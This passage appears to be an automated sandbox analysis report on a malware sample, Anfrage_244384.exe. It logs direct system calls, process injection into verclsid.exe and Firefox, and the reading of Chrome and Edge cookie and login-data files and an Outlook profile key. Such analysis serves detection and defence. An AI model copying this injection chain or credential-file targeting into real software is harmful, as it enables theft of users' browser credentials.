Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A1C7C mov eax, dword ptr fs:[00000030h]		4_2_346A1C7C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667C40 mov eax, dword ptr fs:[00000030h]		4_2_34667C40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667C40 mov ecx, dword ptr fs:[00000030h]		4_2_34667C40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667C40 mov eax, dword ptr fs:[00000030h]		4_2_34667C40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667C40 mov eax, dword ptr fs:[00000030h]		4_2_34667C40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FC4F mov eax, dword ptr fs:[00000030h]		4_2_3472FC4F
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34741C3C mov eax, dword ptr fs:[00000030h]		4_2_34741C3C
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ABC3B mov esi, dword ptr fs:[00000030h]		4_2_346ABC3B
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473DC27 mov eax, dword ptr fs:[00000030h]		4_2_3473DC27
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473DC27 mov eax, dword ptr fs:[00000030h]		4_2_3473DC27
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3473DC27 mov eax, dword ptr fs:[00000030h]		4_2_3473DC27
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F9C32 mov eax, dword ptr fs:[00000030h]		4_2_346F9C32
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474BC01 mov eax, dword ptr fs:[00000030h]		4_2_3474BC01
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3474BC01 mov eax, dword ptr fs:[00000030h]		4_2_3474BC01
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FBC10 mov eax, dword ptr fs:[00000030h]		4_2_346FBC10
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FBC10 mov eax, dword ptr fs:[00000030h]		4_2_346FBC10
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346FBC10 mov ecx, dword ptr fs:[00000030h]		4_2_346FBC10
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34711CF9 mov eax, dword ptr fs:[00000030h]		4_2_34711CF9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34711CF9 mov eax, dword ptr fs:[00000030h]		4_2_34711CF9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34711CF9 mov eax, dword ptr fs:[00000030h]		4_2_34711CF9
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A5CC0 mov eax, dword ptr fs:[00000030h]		4_2_346A5CC0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346A5CC0 mov eax, dword ptr fs:[00000030h]		4_2_346A5CC0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471FCDF mov eax, dword ptr fs:[00000030h]		4_2_3471FCDF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471FCDF mov eax, dword ptr fs:[00000030h]		4_2_3471FCDF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471FCDF mov eax, dword ptr fs:[00000030h]		4_2_3471FCDF
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681CC7 mov eax, dword ptr fs:[00000030h]		4_2_34681CC7
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34681CC7 mov eax, dword ptr fs:[00000030h]		4_2_34681CC7
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667CD5 mov eax, dword ptr fs:[00000030h]		4_2_34667CD5
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667CD5 mov eax, dword ptr fs:[00000030h]		4_2_34667CD5
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667CD5 mov eax, dword ptr fs:[00000030h]		4_2_34667CD5
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667CD5 mov eax, dword ptr fs:[00000030h]		4_2_34667CD5
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667CD5 mov eax, dword ptr fs:[00000030h]		4_2_34667CD5
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F3CDB mov eax, dword ptr fs:[00000030h]		4_2_346F3CDB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F3CDB mov eax, dword ptr fs:[00000030h]		4_2_346F3CDB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346F3CDB mov eax, dword ptr fs:[00000030h]		4_2_346F3CDB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3466DCA0 mov eax, dword ptr fs:[00000030h]		4_2_3466DCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469FCA0 mov ecx, dword ptr fs:[00000030h]		4_2_3469FCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469FCA0 mov eax, dword ptr fs:[00000030h]		4_2_3469FCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469FCA0 mov eax, dword ptr fs:[00000030h]		4_2_3469FCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469FCA0 mov eax, dword ptr fs:[00000030h]		4_2_3469FCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3469FCA0 mov eax, dword ptr fs:[00000030h]		4_2_3469FCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ABCA0 mov eax, dword ptr fs:[00000030h]		4_2_346ABCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ABCA0 mov eax, dword ptr fs:[00000030h]		4_2_346ABCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ABCA0 mov ecx, dword ptr fs:[00000030h]		4_2_346ABCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ABCA0 mov eax, dword ptr fs:[00000030h]		4_2_346ABCA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]		4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]		4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]		4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]		4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]		4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]		4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]		4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]		4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]		4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]		4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]		4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]		4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]		4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3472FCAB mov eax, dword ptr fs:[00000030h]		4_2_3472FCAB
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34673C84 mov eax, dword ptr fs:[00000030h]		4_2_34673C84
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34673C84 mov eax, dword ptr fs:[00000030h]		4_2_34673C84
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34673C84 mov eax, dword ptr fs:[00000030h]		4_2_34673C84
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34673C84 mov eax, dword ptr fs:[00000030h]		4_2_34673C84
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34729D70 mov eax, dword ptr fs:[00000030h]		4_2_34729D70
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34729D70 mov eax, dword ptr fs:[00000030h]		4_2_34729D70
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471FD78 mov eax, dword ptr fs:[00000030h]		4_2_3471FD78
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471FD78 mov eax, dword ptr fs:[00000030h]		4_2_3471FD78
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471FD78 mov eax, dword ptr fs:[00000030h]		4_2_3471FD78
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471FD78 mov eax, dword ptr fs:[00000030h]		4_2_3471FD78
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_3471FD78 mov eax, dword ptr fs:[00000030h]		4_2_3471FD78
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34677D75 mov eax, dword ptr fs:[00000030h]		4_2_34677D75
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34677D75 mov eax, dword ptr fs:[00000030h]		4_2_34677D75
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ABD4E mov eax, dword ptr fs:[00000030h]		4_2_346ABD4E
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346ABD4E mov eax, dword ptr fs:[00000030h]		4_2_346ABD4E
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34667D41 mov eax, dword ptr fs:[00000030h]		4_2_34667D41
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683D40 mov eax, dword ptr fs:[00000030h]		4_2_34683D40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683D40 mov eax, dword ptr fs:[00000030h]		4_2_34683D40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683D40 mov eax, dword ptr fs:[00000030h]		4_2_34683D40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683D40 mov eax, dword ptr fs:[00000030h]		4_2_34683D40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683D40 mov ecx, dword ptr fs:[00000030h]		4_2_34683D40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683D40 mov ecx, dword ptr fs:[00000030h]		4_2_34683D40
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_34683D40 mov eax, dword ptr fs:[00000030h]		4_2_34683D40

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtResumeThread: Direct from: 0x773836AC			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtMapViewOfSection: Direct from: 0x77382D1C			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtSetInformationThread: Direct from: 0x773763F9			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtCreateMutant: Direct from: 0x773835CC			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtNotifyChangeKey: Direct from: 0x77383C2C			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtSetInformationProcess: Direct from: 0x77382C5C			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtCreateUserProcess: Direct from: 0x7738371C			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtQueryInformationProcess: Direct from: 0x77382C26			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtResumeThread: Direct from: 0x77382FBC			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtWriteVirtualMemory: Direct from: 0x7738490C			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtAllocateVirtualMemory: Direct from: 0x77383C9C			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtReadFile: Direct from: 0x77382ADC			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtDelayExecution: Direct from: 0x77382DDC			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtQuerySystemInformation: Direct from: 0x77382DFC			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtOpenSection: Direct from: 0x77382E0C			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtQuerySystemInformation: Direct from: 0x773848CC			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtReadVirtualMemory: Direct from: 0x77382E8C			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtCreateKey: Direct from: 0x77382C6C			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtQueryAttributesFile: Direct from: 0x77382E6C			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtSetInformationThread: Direct from: 0x77382B4C			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtQueryInformationToken: Direct from: 0x77382CAC			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtOpenKeyEx: Direct from: 0x77382B9C			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtAllocateVirtualMemory: Direct from: 0x77382BEC			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtCreateFile: Direct from: 0x77382FEC			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtOpenFile: Direct from: 0x77382DCC			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	NtProtectVirtualMemory: Direct from: 0x77377B2E			Jump to behavior

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: NULL target: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Section loaded: NULL target: C:\Windows\SysWOW64\verclsid.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: NULL target: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: NULL target: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write			Jump to behavior

Source: C:\Windows\SysWOW64\verclsid.exe

Thread register set: target process: 1832

Jump to behavior

Source: C:\Windows\SysWOW64\verclsid.exe

Thread APC queued: target process: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe

Jump to behavior

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Process created: C:\Users\user\Desktop\Anfrage_244384.exe "C:\Users\user\Desktop\Anfrage_244384.exe"			Jump to behavior
Source: C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe	Process created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"			Jump to behavior

Source: dptLotHBnXg.exe, 00000006.00000002.3361913033.00000000019D0000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000000.3013842341.00000000019D1000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174579034.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: dptLotHBnXg.exe, 00000006.00000002.3361913033.00000000019D0000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000000.3013842341.00000000019D1000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174579034.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: dptLotHBnXg.exe, 00000006.00000002.3361913033.00000000019D0000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000000.3013842341.00000000019D1000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174579034.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: dptLotHBnXg.exe, 00000006.00000002.3361913033.00000000019D0000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000006.00000000.3013842341.00000000019D1000.00000002.00000001.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174579034.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 0_2_00405DE5 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405DE5

Stealing of Sensitive Information

Source: Yara match	File source: 00000007.00000002.3362363415.0000000000960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3362535904.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3361838593.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3122242151.0000000034330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3123079037.0000000035D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3362392086.0000000004560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State			Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies			Jump to behavior

Source: C:\Windows\SysWOW64\verclsid.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Source: Yara match	File source: 00000007.00000002.3362363415.0000000000960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3362535904.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3361838593.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3122242151.0000000034330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3123079037.0000000035D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3362392086.0000000004560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY